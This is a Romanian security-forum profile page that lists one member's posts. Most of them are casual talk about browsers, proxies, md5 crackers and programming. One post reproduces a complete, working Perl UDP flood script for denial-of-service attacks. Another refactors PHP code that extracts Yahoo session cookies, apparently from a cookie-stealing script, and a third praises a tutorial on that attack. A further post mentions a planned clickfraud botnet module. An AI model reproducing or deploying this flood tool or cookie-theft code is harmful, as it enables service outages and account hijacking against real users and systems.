Jump to content

dblackshell

Members
  • Posts

    34
  • Joined

  • Last visited

Everything posted by dblackshell

  1. +1 Nytro... nu e greu sa creezi un chat system, ca doar principiul e foarte simplu... daca tu il complici cu interfete, optiuni, extraoptiuni e clar ca va fi greu... dar cat de greu e un program e apreciat de fiecare la nivelul propriu al cunostintelor... ce pentru unu e analiza poate pentru altul e echivalentul lui 2+2...
  2. ... nu stiu cum vezi tu lucrurile, dar RegEx la cat de obscur poate fi uneori, nu poti sa-l folosesti in siguranta... cel mai bine no html, si convertirea simboalelor in entitati html...
  3. tot timpul cand dadeam peste un exploit/0day ma intrebam la ce naiba baga un "banner" imens... sa lase si ei un link si gata... fac dintr-un sql injection asa un big deal... a luat mai mult timp creearea fisierului decat exploatarea vulnerabilitatii...
  4. ^^ chiar acum 5 min am dat de el prin stumbleupon...
  5. daca era geniu nu ar fi fost prins... vai ce buni suntem cu tot sistemul nostru de phishing... hackerii la noi sunt doar un kitch...
  6. sau fati o lista cu cgi-proxy... gen http://www.projectbypass.com, iBypass - The largest, most influential proxy network on the Internet s.a.m.d.
  7. @HellGate "nelimitat" are Vodafone, desii dupa ce intreci 1GB lunar iti scade viteza... dar in retea 3G nu prea simti acest lucru; dupa ce intreci simti urmarile la streamingurile video, doar atat...
  8. lasa-i sa faca, ca dupa aceea poate apuc sa pun in practiva ideea mea de modul clickfraud... -> Productive Botnets | Darknet - The Darkside
  9. DDoS sunt atacurile botnet... care implica "zombified computers" si un "master" care da comenda, iar fiecare zombi executa atacul DoS conform acelei comenzi... LE: http://wind.lcs.mit.edu/~dga/ddos.txt DDoS attack tool timeline
  10. +1... nu am vazut de mult un script facut in python... nice putei sa pui un sleep dupa crearea fiecarui thread caci acolo e "problema" (din cauza caruia iti pica netul)...
  11. eu nu inteleg de ce-i zice DDoS daca e clar doar un program de DoS...
  12. ingenios, niciodata nu m-as fi gandit sa manipulez informatiile din lista de contact... gandire OOTB (out of the box)... +1
  13. de ce sa mai intrii pe siteuri... php -r "echo md5('0desa');"
  14. @benny_loppa: sunt destul md5 crackere deja... (acum au aparut si modele care lucreaza cu GPU)... @odesa: care ar fi aplicabilitatea lui? adica de ce sa criptezi intai un string dupa care sa-l treci printr-un hash?
  15. ah, eu am folosit buna... chiar prima linie din topic; desi pare ca la unele persoane precum ENCODED acest lucru li se pare gay... fiecare cu opinia lui. Ma astept din partea lui ENCODED la o alta formula de prezentare la fel de agreabila precum "buna" ...
  16. #!/usr/bin/perl ############## # udp flood. ############## use Socket; use strict; if ($#ARGV != 3) { print "flood.pl <ip> <port> <size> <time>\n\n"; print " port=0: use random ports\n"; print " size=0: use random size between 64 and 1024\n"; print " time=0: continuous flood\n"; exit(1); } my ($ip,$port,$size,$time) = @ARGV; my ($iaddr,$endtime,$psize,$pport); $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n"; $endtime = time() + ($time ? $time : 1000000); socket(flood, PF_INET, SOCK_DGRAM, 17); print "Flooding $ip " . ($port ? $port : "random") . " port with " . ($size ? "$size-byte" : "random size") . " packets" . ($time ? " for $time seconds" : "") . "\n"; print "Break with Ctrl-C\n" unless $time; for (;time() <= $endtime;) { $psize = $size ? $size : int(rand(1024-64)+64) ; $pport = $port ? $port : int(rand(65500))+1; send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));} via google... e mai dragalas ca nu e spaghetti code
  17. cel mai flexibil browser... hm... ah da firefox... daca e vorba si de plug-inuri... firebug si ubiquity (<- acesta l-a facut castigator fata de chrome)
  18. off topic nu am putut sa iti trimit pm (cica nu permiti/ai drept)... daca vrei sa aflii mailu meu cred ca google te va ajuta (insanesecurity parca )...
  19. alternativa ("infrumusetare cod") pentru cei ce vor :blush: if(strstr($cookie, 'v=1') and strstr($cookie, 'z=')){ //-alternativa-> if(!(strstr($cookie, 'v=1')&&strstr($cookie, 'z='))) exit; //////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////// $cookie = ereg_replace('&p=0', '', $cookie); //-alternativa-> $cookie = str_replace('&p=0', '', $cookie); //////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////// $Y = explode('Y=', $cookie); $Y = $Y[1]; $Y = explode(';', $Y); $Y = $Y[0]; //-alternativa-> $Y = explode('Y=', $cookie); $Y = current(explode(';', $Y[1])); //////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////// $T = explode('T=', $cookie); $T = $T[1]; $T = explode(';', $T); $T = $T[0]; //-alternativa-> $T = explode('T=', $cookie); $T = current(explode(';', $T[1])); //////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////// $d=explode('l=', $mata, -1); $c=explode('/o', $d[1], -1); $neah=$c[0]; //-alternativa-> $d = explode('l=', $mata, -1); $neah = current(explode('/o', $d[1], -1)); //////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////// for ($i=0; $i<strlen($neah); $i++) { if ($neah[$i]=="0") { $buni.="a"; } if ($neah[$i]=="1") { $buni.="b"; } if ($neah[$i]=="2") { $buni.="c"; } if ($neah[$i]=="3") { $buni.="d"; } if ($neah[$i]=="4") { $buni.="e"; } ...etc... //-alternativa-> $val = array( '0' => 'a', '1' => 'b', '2' => 'c', '3' => 'd', '4' => 'e', ...etc... ); $buni = ''; foreach($neah as $value) { $buni .= $val[$value]; } //////////////////////////////////////////////////////////////////////////////// //////////////////////////////////////////////////////////////////////////////// se pot reaplica infrumusatirile ulterioare in mare parte a codului precum si $y = ereg_replace(';', '',$Y); $y = ereg_replace('&', '%26',$y); $y = ereg_replace('=', '%3D',$y); //-alternativa-> $search = array(';', '&', '='); $replace = array('', '%26', '%3D'); $y = str_replace($search, $replace, $Y); //-alternativa--my-fav-(arata misto)-> $y = str_replace( ';', '', str_replace( '&', '%26', str_replace( '=', '%3D', $Y ) ) ); //vam zis ca arata misto
  20. felicitari, dragut tutorial, mai rar gasesti unul step-by-step... ce as vrea sa mentionez (desii poate gresesc)... nu e chiar nevoia aceea mare de PHP pentru cross-domain deoarece mail.yahoo.com/360.yahoo.com/etc sunt pe acelasi domenii, iar cookieul de la yahoo e setat pe .yahoo.com... deci no cross-domain needed. de asemenea ai omis sa prevezi, desii poate caz exceptional; depinde de viteza de raspandire a lui e posibil ca cookie.txt sa fie scris/alterat concomitent... ce s-ar intampla atunci? un alt avantaj (fapt divers) caruia e posibil acest lucru e datorat faptului ca functiile vitale de la yahoo (nu vitale ca securitate, gen compose, read, etc) sunt fara protectii CSRF... nu o lua ca o critica (si eu le urasc); ia-o ca o adaugare...
  21. cum sa integrezi readyState in scriptu tau -> GM_xmlhttpRequest [Dive Into Greasemonkey]
  22. e bine si free pascal, dar se mai intampla sa faca "figuri" IDE-ul... sfatul meu e sa salvezi codul si sa-l compilezi din comanda fpc numefisier.pas desii nu cred ca e de ajuns atat, uitate la helpul compilatorului fpc /? bafta
  23. buna, handelul meu e dblackshell (mai demult foloseam backbone, dar avea ca efect anumite confuzii)... despre mine, nimic interesant. ca si activitate sunt coautor (mai bine zis contribuitor) pe darknet.org.uk, autor pe blogul meu (google insanesecurity, mi-e lene sa-l scriu)... activitate pe forumuri (minimala, din lipsa de interes, sau alte motive) gonullyourself, w4ck1ng, si 0x00000 (desii momentan nu mai exista)... si cum sa uit sla.ckers.org (desii nu prea am mai intrat pe acolo, deja cred ca se prafuise contul)... proiecte skavenger (cel PHP, momentan in "repaus", dar in max o luna ma gandesc la o finalizare), shelley (mort de o buna vreme, ce sa fac daca SirDarckCat a lasat-o moale), wanatomy (inca in stadiul de conceptie [de un an deja]), php-shells (primul milestone a fost acela de a scrie un cod de toata jalea, pentru a il "infrumuseta" cand o sa am timp)... altele in stadiul de lucru (secret momentan)... despre rstcenter... vazusem mai demult baneru pe milw0rm, ma inregistrasem dar nu il urmarisem... ce caut aici? nu 0-day, nu una, nu alta, doar vreau sa fiu si eu informat cum e cu "scena" securitatii prin Romania... poate sa dau o mana de ajutor, daca ma aflu in cauza/statutul de a face acest lucru... in rest numa aducator de pace...
×
×
  • Create New...